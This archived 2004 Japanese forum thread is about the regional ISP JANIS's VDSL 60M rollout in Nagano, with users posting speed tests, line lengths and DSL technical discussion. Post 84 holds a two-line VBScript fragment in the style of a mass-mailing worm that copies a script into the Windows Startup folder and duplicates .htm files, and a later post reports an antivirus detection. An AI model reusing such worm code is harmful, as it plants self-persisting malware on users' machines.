5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

♪♪♪長野県発!頑張れJANISのADSL 3♪♪♪

1 :名無しさんに接続中…:04/07/17 02:02 ID:LB6iDx/h
その1:http://pc3.2ch.net/test/read.cgi/isp/1009724820/
前スレ:http://pc6.2ch.net/test/read.cgi/isp/1044078789/

・参考スレ
http://natto.2ch.net/isp/kako/988/988440168.html
http://pc6.2ch.net/test/read.cgi/isp/1037873135/l50

2 :名無しさんに接続中…:04/07/17 02:15 ID:6m8ZP5KC


3 :名無しさんに接続中…:04/07/17 13:31 ID:3SY1/F1B
>>3


4 :名無しさんに接続中…:04/07/17 21:36 ID:LB6iDx/h
>>4


5 :名無しさんに接続中…:04/07/18 10:17 ID:rfWn7mee
この板も即死はあるのかな?

6 :名無しさんに接続中…:04/07/21 00:46 ID:sQrIagYo
あげ

7 :名無しさんに接続中…:04/07/21 01:24 ID:pVs3c8Wn
なんでことごとく連投規制にかかるんだよ…。orz
同じ鯖(板?)に同じipのやつがいるせいだが…。

8 :名無しさんに接続中…:04/07/22 01:13 ID:2Gabqr0Q
ウルトラ60Mなんてのが出るのか?
8月頃開始だの書いてあるが

9 :名無しさんに接続中…:04/07/23 01:21 ID:fMV2SSP5
9月にはじまるみたいだ。

http://itpro.nikkeibp.co.jp/free/NCC/NEWS/20040722/147600/


10 :名無しさんに接続中…:04/07/23 10:42 ID:Yhen+SkY
JANISの増強予定ページみたら、伊那有線では8月から60M予定と出ている。
川中島有線で50M開始はtopページにもあったが、60Mは初めて見た。
たとえ数字上とはいえ、世の中に50Mや60Mを商用サービスしている事例あるの?
もしかしたら、JANISのVDSL50M,60Mは 国内初? としたら世界初?

どうせ60M近くまで出る回線は局から近距離に限定されるんだろうが、
どのくらいの性能なのか大いに興味あり。
肝心の価格設定もまだ未公表だな。今の26Mや45Mと同じにしてくれよ。

人柱の伊那有線で成果が出たら、早めに全県展開してもらいたい。
おいらは、別の有線だが、9月頭には60Mやってくれるんだろうか。

11 :名無しさんに接続中…:04/07/26 16:24 ID:ux7LVfng
まあ60MのVDSLが有効なのは、局から1kmか1.5kmだな。
それ以上は、ダブルやクワッドと同じじゃないかな。


12 :名無しさんに接続中…:04/07/26 21:46 ID:2Nmhwy55
自分の地域は9月まではVDSLはなしか。。

>>1

どうせならJanisのURL張ってほしかった
http://www.janis.or.jp/

13 :名無しさんに接続中…:04/07/26 23:31 ID:S8cMS1ec
JANISは7月に大幅料金改定したが、どうも8月にその第2弾があるらしい。
前回は1Mとか2Mの入門コースの価格変更だったから、
今回は60Mも含めた高速コースの価格変更の予感。

14 :名無しさんに接続中…:04/07/27 00:17 ID:TmMgp15G
国内最速ですね
http://www.mainichi-msn.co.jp/it/network/news/20040723org00m300142000c.html

15 :名無しさんに接続中…:04/07/27 00:22 ID:RPIULE3o
60Mは国内最速だね。
上りも10Mだし ・・・。


16 :名無しさんに接続中…:04/07/27 12:49 ID:Cv2peX4p
速度はそこそこでいいよ。
最新技術を導入できるという老舗の技術力は認めるけど、
所詮は田舎(伊那か?)でのお遊び程度。
フレッツやYAHOOのような宣伝しないと、弱小ISPは埋没だな。
商品性能だけじゃ売れないよ。

17 :名無しさんに接続中…:04/07/27 21:30 ID:Cv2peX4p
アッカやOCNもJANISにつられて50M・10Mとかを年内目標に開発中だと。
YBBも当然同じ製品出してくるだろうな。
それにしても年内開始みたいな先の不確定情報を流していいんだろうか。
相当あせっている気がする。

フレッツやイーアクセスはどうするんだろうか。

18 :名無しさんに接続中…:04/07/28 09:17 ID:wBLjM4dz
自分伊那有線だけど
グローバル固定も追加料金なしになるんですね。
1年待った甲斐がありました。


19 :名無しさんに接続中…:04/07/28 11:46 ID:wBLjM4dz
にくちゃんねるにつながらないのは
プロバイダのせいかな?

20 :名無しさんに接続中…:04/07/28 12:31 ID:TvDdtWeO
料金補償、固定グローバルIP標準配布、安価なDNSサービス、
リモートファイル管理サービス、WebMail、、
高速サービス開始よりも、こっちに興味あり。

21 :名無しさんに接続中…:04/07/28 20:27 ID:wBLjM4dz
7月27日〜30日の伊那有線のグローバルネットワーク環境構築工事ってのは
ウルトラ60Mの準備なんでしょうか?
いつ50Mになるのかと思ってたら60Mで来るとは…




22 :名無しさんに接続中…:04/07/29 00:27 ID:JAACdzr5
伊那有線は確かxDSLの実験をしていた場所だよね。
60MVDSLが始まるにはふさわしいところかもしれませんね。

23 :名無しさんに接続中…:04/07/29 00:46 ID:pu0aqSRo
グローバルIPが実質値下げってことでいいのか?
あとは、Webメールとその機能拡張
値下げだけじゃなくて、面白そうなことやりますよね。
早くVDSLのエリア拡大を祈ってます。

24 :名無しさんに接続中…:04/07/29 13:16 ID:o7PzSWXn
>>22
かつてはメッカだったかもしれないけど、今は。。。。。
たまたまなんじゃないの

25 :名無しさんに接続中…:04/07/29 20:26 ID:5UDA+PJs
グローバルIPかって無いけど
ポートって開くの?

26 :名無しさんに接続中…:04/07/30 01:05 ID:pCo1inSP
>>24
昔昔の物語。当時はみんな活気があったみたいだけど、、
60Mサービスが 大当たりとなれば、お久し振り!のルネッサンスだけど、
全然受けないようだと、化石みたいな有線と言われる。。

27 :名無しさんに接続中…:04/07/30 09:49 ID:QfIjlqE5
なつかしいなJANIS・・・
実家にいた頃使ってたっけ

28 :名無しさんに接続中…:04/07/30 13:14 ID:2ly3ANaz
ウホーーー!!
実際家から局までなんkあるんだろー
いつウルトラ60開始だろー
たのしみーだー

29 :名無しさんに接続中…:04/08/02 20:06 ID:nIb8EuOi
ウルトラ60Mからc⌒っ*゚д゚)っφ 記念カキコ



30 :名無しさんに接続中…:04/08/02 21:38 ID:CeP9yGS5
>>29
おぉ!
60Mおめでとうございます。
速度とかどんな感じですか?

31 :29:04/08/02 22:15 ID:nIb8EuOi
計ってないけど、早いの一言ですよ!

32 :名無しさんに接続中…:04/08/02 23:30 ID:aq/mtUvi
>>31
もう繋がっているのか・・・


33 :名無しさんに接続中…:04/08/02 23:55 ID:V4DkHxWx
はやくこいこいウルトラ60

34 :29:04/08/03 00:00 ID:+k/8cSFo
オイラの地域では一番乗りです♪

35 :名無しさんに接続中…:04/08/03 04:15 ID:IhOxeY0n
 

36 :名無しさんに接続中…:04/08/03 23:05 ID:0Ph5rsLz
ADSLユーザを1名紹介するたびに5000円くれる制度が正式にHPで公開された。
毎月2名づつ紹介し続ければ、janisの料金は チャラだな。
さーーて、電話作戦でもやって、小遣い稼ぎさせてもらうか。

37 :名無しさんに接続中…:04/08/05 11:47 ID:GjXMuw4w
あげとく

38 :名無しさんに接続中…:04/08/05 21:55 ID:osqc81iV
>>29
計ってよ

39 :名無しさんに接続中…:04/08/06 16:14 ID:akYuyRrX
実家に帰省したのでひさびさにジャニス下記子。
速くナッテル…
8Mコースで6.8Mとは…
恐るべし。前は1M強だったのに…
なにかバックホーン変わったの??


40 :名無しさんに接続中…:04/08/06 19:09 ID:aG+pxoW3
なにげに高速化してくれたり、
なにげにコースを無料で上の速度に上げてくれたり、
なにげに料金を下のコース料金に下げてくれたり、
なにげに世界一のVDSL60Mとやらをど田舎で開始してくれたり、、

ほめていたら、今朝からインターネットに抜けるのが遅い、
なんでも上位プロバのYBBに障害があったようで。



41 :名無しさんに接続中…:04/08/06 19:23 ID:uBu9XgyJ
地域プロバイダとしてはよくやってるよ、JANISは。

42 :名無しさんに接続中…:04/08/06 22:10 ID:2gQtki6I
障害発生○| ̄|_チャンコロの攻撃だろうか・・・

43 :名無しさんに接続中…:04/08/07 10:29 ID:DKdtjCdm
夏だからトラフィックの限界でも迎えたとか?

44 :名無しさんに接続中…:04/08/07 22:27 ID:qooYNvqH
60Mはどれくらい出てる。
ここで調べてみて。
http://www.janis.or.jp/janis-bb/



45 :名無しさんに接続中…:04/08/08 20:27 ID:LikfxJW5
伊那有線
VDSLモデム届きました!
月曜日開通らしい。どれぐらい速度出るかたのしみでつ

46 :名無しさんに接続中…:04/08/08 21:57 ID:HAtQbR2K
>45
はやく、はやく。

47 :名無しさんに接続中…:04/08/09 11:04 ID:woyT2fPH
なんで伊那だけ先行するんだろうか?
想像だけど、人柱的な意味もあるんじゃないのかな。
なんてたって、まだどこでも動いていない代物でしょ。
いくつかのデータを採ってファーム改善とかある気がする。。
その他の有線やNTT回線はその結果を待っているのか。
多少問題あっても、俺んところの有線でも早く始めてもらいたい!

48 :名無しさんに接続中…:04/08/09 11:31 ID:5kGWuDJU
伊那有線より

[ウルトラ60M]
測定サイト http://www.bspeedtest.jp/ v2.3.3
測定時刻 2004/08/09 11:14:13
回線種類/線路長/OS ADSL/1.0km/Windows XP
キャリア/ISP/地域 その他ADSL/その他/長野県
ホスト1: WebArena(NTTPC) 14Mbps(4236kB,2.7秒)
ホスト2: SAKURAインターネット 14Mbps(9971kB,5.9秒)
推定最大スループット: 14Mbps

[アドバンス12M]
測定サイト http://www.bspeedtest.jp/ v2.3.3
測定時刻 2004/08/09 10:08:47
回線種類/線路長/OS ADSL/1.0km/Windows XP
キャリア/ISP/地域 その他ADSL/その他/長野県
ホスト1: WebArena(NTTPC) 9.4Mbps(2244kB,2.2秒)
ホスト2: SAKURAインターネット 9.5Mbps(4236kB,3.7秒)
推定最大スループット: 9.5Mbps

現在の所,期待していたよりは速度が出ていないです。
上りのリンク速度は800〜850kbps(1M以上はでると思っていました)
調整すれば改善するかな?

49 :名無しさんに接続中…:04/08/09 12:23 ID:woyT2fPH
局から何キロ離れているの?
リンクアップ速度とかは出ないの?


50 :名無しさんに接続中…:04/08/09 14:57 ID:5kGWuDJU
リンク速度は下り16605 kbps,上り810 kbps
推定線路長は1337 メートル


51 :名無しさんに接続中…:04/08/09 16:12 ID:GQVLSFl9
>50
1337mなら限界でしょうねえ。
リンク速度が16Mなら悪くはないと思います。


52 :名無しさんに接続中…:04/08/09 18:30 ID:woyT2fPH
うひひ。。
線路長が778mと表示されてますが、
リンク速度が 下り22,680kbps、上り2,835Kbps です。

局から1km以内なので、上りが2.8Mも出てます。
もう少しチューニングで速度アップできるんじゃないか、と期待。

53 :名無しさんに接続中…:04/08/13 20:50 ID:N7n4lcEZ
農協のATM吹っ飛んで協同電算大変らしいですね
Janisには影響ほとんどないだろうけど・・。

54 :名無しさんに接続中…:04/08/14 09:20 ID:uqY0J6yg
JANISの障害だけぢゃ飽き足りず農協ATMにも障害出したか・・・というのが正直な感想。
もちっと安定性に金かけて欲しいよ。

55 :名無しさんに接続中…:04/08/14 16:23 ID:6QFJGOB+
川中島有線西部局

[ウルトラ60]
測定サイト http://www.bspeedtest.jp/ v2.3.3
測定時刻 2004/08/14 16:21:14
回線種類/線路長/OS ADSL/-km/Windows XP
キャリア/ISP/地域 その他ADSL/-/-
ホスト1: WebArena(NTTPC) 20Mbps(6008kB,2.6秒)
ホスト2: SAKURAインターネット 23Mbps(16870kB,6.1秒)
推定最大スループット: 23Mbps

こんなもんなの?


56 :名無しさんに接続中…:04/08/15 01:00 ID:+8yya5f5
>>55
モデム間のリンク速度は?
ttp://www.janis.or.jp/janis-bb/link/link.html

盆あけたら開始情報更新されないかなあ

57 :名無しさんに接続中…:04/08/15 21:23 ID:k8rAqWuL
8Mプラン:5M=60M:x
    300M=8x
       x=37.5M


こんな感じにはならないのか
25Mぐらいなのか・・・・  

58 :名無しさんに接続中…:04/08/16 08:54 ID:JsPQKMLX
DSL高速化は使う周波数の幅を広げて実現するのが基本。
12Mbpsまでは、下り帯域として1.1MHzまでを使い
それ以上の高速化は2.2MHzとか4MHzまでを使っているはず。
VDSLは更に高帯域である8MHzや12MHzまで使って高速化を実現。

つまり、回線品質が悪くて、8Mや12Mコースでも思ったほどの
速度が出ていない場合や、その上の26Mコースで12Mも出ていない場合は
高帯域を使えない回線なので、そんな回線に60Mモデムを適用しても無駄。

高速化=高出力化であれば、より速いコースにすればそれなりの増速となるが、
高速化=高帯域化なので、回線品質が悪ければ、増速化は見込めない。

60Mコースの効果が出るのは、局から1kmないし1.5km程度ではないか。
それ以上なら従来の8Mや12M,26Mと同じ性能だと思われる。
まあ、それでも料金補償制度があるから、実質的な損はないけど。

59 :名無しさんに接続中…:04/08/21 15:29 ID:fZWMMnAH
無線LAN対応キボンヌ

60 :名無しさんに接続中…:04/08/21 17:21 ID:kJGWJ3IH
無線LANなんて普通にできるよ

えきねっととかそういう類なら知らんけど

61 :名無しさんに接続中…:04/08/24 23:54 ID:lmJ7hTzL
>53
農協でお金下ろせなかったけど、じゃにすは使えていたから安心したよ!
ATMとインターネットは関係ないか。
生活と信用を考えるとやっぱATMが大事だから、設備に金かけてくれよな

62 :名無しさんに接続中…:04/08/28 13:29 ID:9ymuZdSp
ご契約コース 有線スタンダード8M
接続速度(下り方向) 8064 kbps
接続速度(上り方向) 1120 kbps


63 :名無しさんに接続中…:04/08/28 23:50 ID:9sHl9oUN
>>62
を見て、リンク速度見てみたら
ご契約コース 有線スタンダード8M
接続速度(下り方向) 8064 kbps
接続速度(上り方向) 896 kbps
上りの速度1M逝ってないし_| ̄|○

64 :名無しさんに接続中…:04/08/29 02:04 ID:bWeU/BMR
>>63
ご契約コース 有線スタンダード8M
接続速度(下り方向) 8064 kbps
接続速度(上り方向) 896 kbps
うちも同じだ(´・ω・`)

65 :名無しさんに接続中…:04/08/30 12:49 ID:GEJsMWCO
8Mコースで8096k出てるとは、流石に有線回線だな。
上りが896だろうが1120だろうが、そんなこと問題外。
上りは100kもあれば、P2P以外の一般ユーザにとって体感上の差はない。

上り3M,5M,10Mという新サービス競争が始まっているが、
そこまで使いこなすユーザって果たして何%いるんだろうか。

66 :名無しさんに接続中…:04/09/04 17:58 ID:4ZRRMF4h
使いこなすというより、たった300円でえらい違うしなあ。うちの有線でも早く開始してほしいよ。
8月下旬から順次って9月になっても全く音沙汰ないしどうなってるんだろか。

67 :名無しさんに接続中…:04/09/06 20:32 ID:mjkaDRDQ
VDSLのコースの提供エリア拡大してきましたね。
この調子でどんどん広げていただきたいものです。

68 :@@@:04/09/06 23:38 ID:vNL0k1yv
 

平成16年9月6日 ・
リーチ1.5Mコース開始のお知らせを掲載しました。
(NTT野尻湖で、9月6日から開始)

ウルトラ60Mコース開始のお知らせを掲載しました。
(篠ノ井有線本局で、9月9日から開始予定)
(丸子有線本局、丸子有線依田局、丸子有線長瀬局で、9月10日から開始予定)
(丸子有線塩川局、丸子有線腰越局、丸子有線西内局で、9月13日から開始予定)
(上田有線神科局、上田有線川辺局で、9月14日から開始予定)
(青木有線本局、青木有線村松局、川中島有線本局、川中島有線支局で、9月15日から開始予定)
(大町有線常盤局、屋代有線本局、屋代有線倉科局、坂城有線本局、坂城有線横尾局、埴生有線で、9月下旬開始予定)




俺の誕生日に開始キター!

69 :名無しさんに接続中…:04/09/07 23:16 ID:1T1z4yAX
>>68
キタ━━━(゚∀゚)━( ゚∀)━(  ゚)━(  )━(  )━(゚  )━(∀゚ )━(゚∀゚)━━━!!
と思ったらキテネぇ。同市の他局では始まる予定なのに。
たぶん、需要が高い方から順に準備し始めてんだな。
年末ぐらいの悪寒。

70 :名無しさんに接続中…:04/09/13 22:28:13 ID:7HwFG2zI
なんかJanisの掲示板に変なのが沸いてきている・・・


71 :名無しさんに接続中…:04/09/14 00:56:10 ID:2BcyrID9
だいぶ前からいるでしょ

なんかの暗号か?

72 :名無しさんに接続中…:04/09/14 02:02:10 ID:oJJvlDg1
60Mコースの人に質問〜

nyの調子はどう?

73 :名無しさんに接続中…:04/09/14 09:09:18 ID:XmRXcLhW
ご契約コース スタンダード8M
接続速度(下り方向) 1280 kbps

。・゚・(ノД`)・゚・。

でも900円安くなるからいいか・・・


74 :名無しさんに接続中…:04/09/18 19:38:06 ID:g2g6nfDy
ほしゅ。

75 :名無しさんに接続中…:04/09/23 20:19:48 ID:6zVUIdGO
だれだよ。掲示板にいた変なやつに切れてる奴はw

76 :名無しさんに接続中…:04/09/24 19:42:06 ID:4066wS2E
掲示板にVDSLにつながった人のコメントあるけど、あんなもんなのかね?
40Mくらいは出るかなと思ってたけどちょっと残念。

77 :名無しさんに接続中…:04/09/24 20:59:13 ID:gDg3yQ96
>>76
局からの距離によって違うみたい。
JANISのサポートに問い合わせたら、50M近く出ているケースもあるけど、
継続して高速化のためにchipベンダーと一緒になって
プロファイルとやらの改良やら、ファームウエアの改良をやっていて、
近いうちに最新ファームに入れ替えるような雰囲気だった。

なんでも、将来は、このモデムがリーチDSLに置き換わる構想もあるとのことで
詳しくはわからなかったけど、JANISさんは、相当熱が入っているよう。
どうしてVDSLが遠距離モデム対応に変身できるのか俺にはわからなかったが。

ついでに他でどこかが使っているのか聞いたら、
国内はJANISだけだけど、お隣の先進国の超大手が導入準備をしているらしい。
それが成功したら、国内の他の事業者はどうするんだろうか?

78 :名無しさんに接続中…:04/09/25 06:05:43 ID:TIoKh1E0
そーいや、WindowsXP SP2だと内部的にネットワークの速度を制限させているらしいって聞いたけど?
ほんとかな?
それを解除するパッチも裏で出回っているとかなんとか。

79 :名無しさんに接続中…:04/09/25 07:21:19 ID:fg4M/288
>>75
それを諭してるヤツも2chねらー丸出しですげぇ馬鹿っぽい

80 :名無しさんに接続中…:04/09/26 21:17:23 ID:ia37/F/o
>77
長野は進んでいるよな。
県ネットだの地域IXだの、
そんなバカをやってるどっかの県も見習ってほしいよ。


81 :名無しさんに接続中…:04/09/28 01:38:20 ID:49ksTbwk
>>80
「長野県が」ではなく「電算が」だよな。
行政ではなく一企業だ。

82 :名無しさんに接続中…:04/09/29 12:50:48 ID:Kp/THPa4
>>81
「協同電算が」だね。
 行政としての県についていえば、これまで無駄な税金を投入しての県ネット構築を
 見送ってきたことが結果として県民益になっているな。
 だからといって、なーーんにもならなくていいわけではなく、
 県全体の情報活用リテラシー向上対策はやるべきです。
 それと、企業論理では展開しにくい過疎地のBB化対策も、行政の仕事かと。

83 :名無しさんに接続中…:04/10/02 00:23:24 ID:tGC92AFR
なんかたまに繋がんないから上げとく。

84 :名無しさんに接続中…:04/10/02 15:43:51 ID:mMhjboZW
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\startmenu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"

85 :名無しさんに接続中…:04/10/03 01:59:14 ID:1H26Y2UF
60Mにコース変更した人に聞きたいんだけど、
申し込みして何日くらいでモデム届きました?
うちはモデムを送るってメールがきてからかれこれ1週間。
これって遅いのかな?
申し込みしてからはそろそろ2週間は経つんだけど・・・

86 :名無しさんに接続中…:04/10/06 21:19:42 ID:Ebi5MTx7
なぜか、ソフトバンクパブリッシングの発行している、YAHOOInternetDuide Uの
11月号に、 JANISのウルトラ60Mについての紹介記事が4ページも出ていた。

87 :名無しさんに接続中…:04/10/06 22:55:35 ID:zfTQHr8c
木島はジャニスなの?
うわさできいたけど

88 :何じゃ???:04/10/07 08:59:18 ID:naY7Fthv
ウィルスが見つかりました。
ウィルス名: VBS.Internal

89 :名無しさんに接続中…:04/10/07 09:31:45 ID:wigpFZbk
今障害発生してる?midで全然繋がらないのだが・・・
携帯からでスマソ

90 :名無しさんに接続中…:04/10/09 15:01:51 ID:EeVD7pIv
最近メッセでログインにかなりの回数失敗するな・・・・・調子悪いのか?

91 :名無しさんに接続中…:04/10/11 21:17:25 ID:v/idJXEK
保守

92 :名無しさんに接続中…:04/10/12 12:29:46 ID:igBgWgIy
>>87
木島平村は PON方式のftthらしいね。
B-PONだと、Bフレッツの安いコースと同じく、100Mをぶら下がっているユーザ数で
割って、時分割多重するから、20人で共有すると5Mに制限されてしまう。
100Mインタフェイスではあるけど、20Mや30Mしか出ないのはそのせいかも。
今からやるなら、そろそろ標準化が確定しそうな、GEーPONだよね。

でも、村全戸に光を引き込むのは 凄いことだ。
住民負担がどのくらいで済むのか心配だけど、いいスポンサー見つけたのか。

93 :名無しさんに接続中…:04/10/12 15:32:17 ID:igBgWgIy
あのシス協に、高いコンサルティング料金をふんだくられているんだから、
シス協が責任取ってくれるんでしょ。きっと。
所詮は、税金の分捕り合戦で、もらったもんの勝ちだからな、この世界は。

94 :名無しさんに接続中…:04/10/12 22:27:41 ID:D9PhIGeg
ウルトラ60Mうらやますぃ。

うちはNTT局から3930m、43dbということでリーチコースでしたが、
今日アドバンス12Mに換えました。

リーチの時のモデムリンク速度は896kbpsでしたが、アドバンス12Mでは
2816kbpsまで向上しました。

12Mは速度向上の他に「長距離対応」という大きな特徴があります。
長距離対応に関しては12Mで技術的にやり尽くしたという記事を見かけた
ことがあります。

そんな記事を鵜呑みに?にしてコース変更しましたが、結果には満足して
います。

局からの距離とか伝送損失などの条件によるけど、余程悪条件でない限り
リーチやリーチ1.5にする必要ないかも。

リーチ使っている方、参考に。

95 :名無しさんに接続中…:04/10/13 01:27:52 ID:uvmcGalh
今月はウルトラ60M新規開通無いのかな

96 :名無しさんに接続中…:04/10/13 01:49:11 ID:9eNMctr3
新規はないだろうねえ。開始が発表されてる局だって工事が間に合ってないみたいだし。
先月発表きて即申し込んだけど、モデムすら届いてない状態。

97 :名無しさんに接続中…:04/10/18 17:10:29 ID:3rxols8l
ホシュ

98 :携帯からカキコ:04/10/21 07:21:50 ID:NC0rbXaH
障害発生中らしくて接続できないんだけど、詳細がわからない(ToT)

99 :名無しさんに接続中…:04/10/21 14:44:00 ID:0uBFZ82I
ジャニスって電話の対応最悪だな。
なんだ、あの態度。

100 :名無しさんに接続中…:04/10/22 03:16:01 ID:I2fsbANb
>>99
くわしく

101 :名無しさんに接続中…:04/10/22 18:35:13 ID:0KZiJ2HT
名前を名乗っているはずだが。。
減給覚悟での対応なのか。
ばかなやつだね。

102 :名無しさんに接続中…:04/10/25 22:40:56 ID:LEaPEg8K
NTT局舎まで5.5km 損失54dBでJanisのアドバンス12Mコース
かinfovalleyの最高通信速度24Mbpsの「カイソク24」のどちらに
しようか迷っています。infovalleyの方がやや優勢ですがバックボーン
が100Mってところが引っ掛かるのです。ご意見宜しくお願いします。

103 :名無しさんに接続中…:04/10/26 10:31:43 ID:njJfkcx1
NTT回線ですよね。
もともと距離があって、損失が54dBもある回線ですから、
シングルスペクトルである最大1.1MHzまでしか通らない可能性が大です。

すると、低周波帯域を上りと下りでオーバーラップし、EC方式を採用している、
JANISさんのアドバンス12Mが 効いてきます。

「カイソク24」なるサービスがNTT回線なのか、有線回線なのか不明ですが
少なくとも54dBではあえてダブルスペクトルのモデムを採用する意味はないでしょう。
害にはなりませんが、高周波帯域は期待できない、ということです。

ADSLなら、実績と気合の入れ方からして、JANISさんではないでしょうかね。
あと、ISP選定にあたっては、料金面や、機能面も検討されたらいかがでしょう。



104 :名無しさんに接続中…:04/10/26 10:54:58 ID:ftbaL9Py
NTT回線だとエコキャンがそんな距離で使えるわけなかろう(有線放送なら何でもこいだが)
距離制限の厳しい方式なわけで・・
Annex.A(sOL)は3.25km以内限定

TDDの意味でオーバーラップだと言ってるならわかるけど

まあ、選べるのならReachDSLが向いてると思う
それがダメならFBMsOL(フレッツなら24M以上限定, 多分Janisの12Mはついてる)とかFBMになるんじゃないかな
なので一概に「ダブルスペルトラムのモデム」は不要とは言えない
(ダブルスペクトラムは使わないがフレッツ系はダブルスペクトラムのモデム以降でないとFBMsOLモードがない)

105 :104:04/10/26 11:05:02 ID:ftbaL9Py
勘違いしてた
多分Janisの12MにはFBMsOL(長距離モード)は付いてない

Centillium系以外は使ったことないからどうもよくわからん(汗

106 :名無しさんに接続中…:04/10/26 20:52:42 ID:njJfkcx1
>>105
JANISさんがアドバンス12Mコースで使用しているモデムは、
G.992.1AnnexA(sOL)クラスA仕様で、これには例のTTCでのいきさつがあって、
限界線路長制限はありません。
また、このモデムには、138KHz以下を下りに使うエコキャンがついてますね。

逆に、Centillium系でのエコキャンなんて聞いたことないですが、
最近はエコキャンできるまでに改良されてきたのかな?
Centillium系こそTDDなのでは。


107 :102:04/10/26 22:47:14 ID:WNLkYprF
>>103,104,105,106さん、レスありがとうございます。
説明不足スミマセン。「カイソク24」は有線DSLです。
調べたところ有線局舎が家から2kmの所に有るようです。
但し、バックボーン100MBってところが気になりますが
如何でしょうか?


108 :名無しさんに接続中…:04/10/27 11:21:33 ID:uIfme9D8
インターネット−−−ISP−−−有線本局−−−有線支局−−−ユーザ宅
        ?1   ?2 ?3     最大24M

バックボーン100Mはどこを指していますかね。
?1のバックボーンはどのISPも帯域管理してますから大丈夫ですよ。
?2の県内中継網が問題です。自前の光回線を持たないと、MDNなら細いです。
?3の局間中継も問題です。ここもMDNなら細くなります。
?4に24M出るとしても、?2と?3がネックとなり、最大10M程度の実効速度になることもあるでしょう。
局から2kmということですから、モデム間は12Mないし8M程度でしょうけど。

ちなみに、JANISさんの回線構成だと、
?1 は 1G
?2 は 1Gと100MでNTT局に入り、
?3 は 有線本局からでなく、NTT局から100Mで有線支局に入る ようです。
       


109 :名無しさんに接続中…:04/10/27 11:24:19 ID:uIfme9D8
>>108
 ?1 は インターネット−− ISP
 ?2 は ISP−− 有線本局
 ?3 は 有線本局−− 有線支局
 ?4 は 有線支局−− ユーザ宅 

でした。

110 :名無しさんに接続中…:04/10/27 15:18:41 ID:MtZj9SrA
>107
グローバルアドレスがほしければJANIS。
プライベートアドレスでよければどちらでもよし、では?
速度は8Mあれば十分でしょう。
安ければそれでよし、では?


111 :名無しさんに接続中…:04/11/02 13:20:55 ID:WTk/E+11
>>106
G.992.1AnnexA(sOL)クラスA仕様は特例でクラスA分類になっているのだけど、
3.25km以内という距離制限も付いているという変な状態になってるのです
クラスA’じゃないのか? とか思うのだけど、例の事情で第1群じゃなきゃいけないのでしょう
(スペクトル適合性確認結果報告書2004年9月15日版より)

# Centillium系はようやく47M系になってエコキャンが実装されてます

112 :名無しさんに接続中…:04/11/04 15:48:05 ID:lDJZEpxM
>>111
# Centillium系はようやく47M系になってエコキャンが実装されてます

とありますが、どの周波数帯域でエコキャンがかかっているのでしょうか?
もし知っていたら、教えてください。
TTCにはそのような方式は提案されていないのでは。


113 :111:04/11/05 17:52:28 ID:2eKUUTBd
EU-ほげほげな方式とEU-TIFほげほげな方式のスペクトルマップ見てくだされ。
あと、クワッドスペクトルADSL DBM (OL)とか。

いわゆる上り5M/下り47Mの方式は、
「クワッドスペクトル ADSL DBM(OL) EU-S112」
なんだけど、これは25〜483kHzでオーバーラップ(エコキャン)してます。

上りも下りもNEXT/FEXT双方のタイミングで出力するわけで、当然エコキャンなのですが。

114 :名無しさんに接続中…:04/11/07 20:36:30 ID:GYNdj1+P
お客様の収容局 松代本局
ご契約コース 有線スタンダード8M
接続速度(下り方向) 11070 kbps
接続速度(上り方向) 810 kbps
推定線路長 1337 メートル

コース変更したばかりだと変わらないらしいけど
60Mコースのモデムリンク速度です。
有線でこれだしNTT回線じゃ全然だめっぽ?

115 :名無しさんに接続中…:04/11/10 00:18:16 ID:As02GfqC
>>114
推定線路長 1337 メートル これだけあるとこんなもんかな?
800mぐらいだとけっこうでるけど
NTTの局が有線の局より近ければ速くなる可能性は有る。

116 :名無しさんに接続中…:04/11/23 20:34:41 ID:gxdLi+xE
ケーブルある人はいいな。

117 :名無しさんに接続中…:04/11/30 23:09:47 ID:V3yFzCGM
我が古里では明日からウルトラが来るようなので
早速申し込んでみようと思うけれど
我が家は有線局から4kmもあるので
あまり意味がないだろうなぁ。

118 :名無しさんに接続中…:04/12/01 00:39:28 ID:4uuWKI/k
60M記念カキコ
お客様の収容局 ***
ご契約コース 有線スタンダード8M
接続速度(下り方向) 51030 kbps
接続速度(上り方向) 7560 kbps
推定線路長 136 メートル

局はお隣かぁ??


119 :名無しさんに接続中…:04/12/01 21:07:46 ID:yRwWEfZv
>>118
早いなぁ。うらやましい。
うちもそろそろ開始予定なんで、楽しみですが、ちょっと離れてるからなぁ。。

120 :名無しさんに接続中…:04/12/02 15:22:51 ID:bAROMRdU
>>118
これは凄いデータだ。
上り10M、下り60Mは うそではなかったようだ。
でも、局から136m って? 
そりゃ、速くて当然か。

今日のJANISのHPで、いよいよNTT局でも開始とある。
さんざん待たせたが、まあ年内ぎりぎりのクリスマスプレゼントになった。
せこい事をしないで、全県全局一斉に、がんがんやれや。
どうせけちなNTTは、長野県のような僻地県でのFTTHは後回しになるはず。
やるなら、今だな。

121 :名無しさんに接続中…:04/12/06 12:45:52 ID:0AN6YZdA
>118
日本最速でしょう。
世界最速かもよ。


122 :名無しさんに接続中…:04/12/08 22:08:47 ID:qfsrfIYY
本家の掲示板に出ていたが、確かにあのWEBメールはうまくできてるな。

123 :117:04/12/08 23:35:40 ID:NALsNc8c
ウルトラを駄目で元々とばかり申し込みました。
今日、丁重なメールで「無駄。(意訳)」との
お返事がありました。

124 :名無しさんに接続中…:04/12/09 15:46:16 ID:Z/ZOzSQv
>123
今8M契約で6Mくらい実測でてるんでいけるかなーと思い
だめ元で申し込んだけど同じくやめておいた方がいいんじゃない?って
メールもらいました・・・・
ちなみに距離2.8K 損失28dbです  突撃しようか考え中^^

125 :名無しさんに接続中…:04/12/09 16:27:52 ID:EKZkrt1U
>>124
損失28dBで6Mbpsは ちょっと遅いですな。宅内配線の問題か?

だめもとでやっても今の6Mと同じなら料金は変わらないから
男は勝負!ですよ。
なんて、人柱を迫っていいのだろうか。

人生は面白くなくっちゃ。競馬や宝くじより 面白いじゃん!!

126 :名無しさんに接続中…:04/12/09 20:08:06 ID:EKZkrt1U
確かに、速度が出なかったら出る速度に応じた料金に値引きするようなので、
だめもとで挑戦するのも面白いな。
NTT回線での効果は不明だが、有線は確かに効果ありそう。
俺は、今12Mコースで11M出てるので、60Mコースなら30Mは出そうな予感。

127 :名無しさんに接続中…:04/12/10 19:27:06 ID:pUDsTubI
昨日ADSLが開通したけど、距離2.9キロ・伝送損失46dbで8Mはやっぱりきつかったかな。
